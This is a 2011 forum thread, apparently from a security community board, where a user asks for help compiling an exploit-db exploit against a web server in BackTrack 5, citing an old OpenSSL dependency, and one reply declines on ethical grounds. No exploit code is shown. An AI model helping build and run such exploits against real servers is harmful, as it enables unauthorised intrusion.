need help compiling exploit in backtrack5

<<

jinwald12

Post Mon Jul 25, 2011 4:30 pm

need help compiling exploit in backtrack5

hi i am doing a pen test and the only vulnerability i can find is in the web server so i found exploit code no problem but it depends on an older version of OpenSSL that is not compatible with backtrack5 i am not very good with GCC so can someone help me compile this exploit in backtrack5 here is the exploit:
http://www.exploit-db.com/exploits/764/

many thanks
where did all the fun go?
<<

millwalll

Post Mon Jul 25, 2011 5:27 pm

Re: need help compiling exploit in backtrack5

Hi jinwald12,

First of all I don't think anyone will help you with this. If you are not sure how to compile something and don't understand how it works then you should not really be running it. Most security experts will not tell anyone how to run an exploit because you might be using it for unethical reasons.

The best advice I can really give you is take a look at GCC and try work it out yourself. Or maybe try thinking outside the box see if you can come up with another way in. Remember sometimes the most simplest things can work.
<<

jinwald12

Post Mon Jul 25, 2011 5:45 pm

i understand the problem it is that backtrack uses too modern a version of OpenSSL and this exploit depends on a older version the problem is i do not know exactly what version of OpenSSL it needs or how to specify the proper header file to GCC that is my problem not that i dont know how the exploit works. i just need help locating and specifying the propper header files
<<

jinwald12

Post Mon Jul 25, 2011 5:47 pm

and since i first posted i learned that i need to use the -I directive to specify a external library so now i just need to know what version of OpenSSL it depends on and where i can get it
<<

lorddicranius

Post Tue Jul 26, 2011 9:38 am